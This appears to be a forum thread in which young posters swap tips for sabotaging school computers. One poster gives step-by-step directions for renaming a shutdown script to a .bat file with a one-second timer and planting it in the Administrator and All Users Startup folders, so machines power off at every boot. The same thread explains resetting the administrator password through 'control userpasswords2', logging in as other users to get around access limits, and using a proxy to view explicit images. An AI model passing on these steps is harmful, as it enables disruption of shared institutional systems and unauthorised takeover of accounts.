BEFORE YOU CHANGE THE FILE NAME DO THIS:
i have the time limit on 100 incase you run it by accident. just delete the two 0s so it reads at the moment -t 100 change that to -t 1
then
change the txt to bat so its called shutdown.bat not shutdown.txt
then place this script i uploaded into the:
C:\Documents and Settings\All Users\Start Menu\Programs\Startup
and
C:\Documents and Settings\Administrator\Start Menu\Programs\Startup
folders
about the change password thing just go to start run type in control userpasswords2 and depending on how secure your school is a list of users might come up if it does click administrator and choose reset password and if you get a warning press ok/yes (forgot which one it is - think its ok)
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ahh.... the windows key and run tab are disabled on mine, shame, we were going to configure stuff with it, but it didnt work, naughty images on the school computers via my proxy keeps my friends happy for now, thansk anyway!
why dont you make a shortcut at home to the two folders then use that? thats what i used to do until they prevented read access to the c drive just to my username so i logged on as someone else lol supid skl
quote:Originally posted by computery
why dont you make a shortcut at home to the two folders then use that? thats what i used to do until they prevented read access to the c drive just to my username so i logged on as someone else lol supid skl
me<you ~ your going off into non-nooby language again... lol
lol make one short cut to
C:\Documents and Settings\All Users\Start Menu\Programs\Startup
and call it all users then make another one to
C:\Documents and Settings\Administrator\Start Menu\Programs\Startup
and call it admin then take all 3 files in with you on a usb drive/mp3 player/floppy disk whatever and go to my computer and open the drive and choose the file then CTRL+C then double click one of the shortcuts and press CTRL+V then press back and press CTRL +C on the shutdown.bat file again then double click the other shortcut and press CTRL+V
quote:Originally posted by computery
lol make one short cut to
C:\Documents and Settings\All Users\Start Menu\Programs\Startup
and call it all users then make another one to
C:\Documents and Settings\Administrator\Start Menu\Programs\Startup
and call it admin then take all 3 files in with you on a usb drive/mp3 player/floppy disk whatever and go to my computer and open the drive and choose the file then CTRL+C then double click one of the shortcuts and press CTRL+V then press back and press CTRL +C on the shutdown.bat file again then double click the other shortcut and press CTRL+V
wow... if i get banned on monday im gonna bake you a cake... lol, im just THAT kind...
lol cheers yea ill delete that now and move it too oneoh i forgot to add when you have finished using the pc restart it so that it keeps turning off lol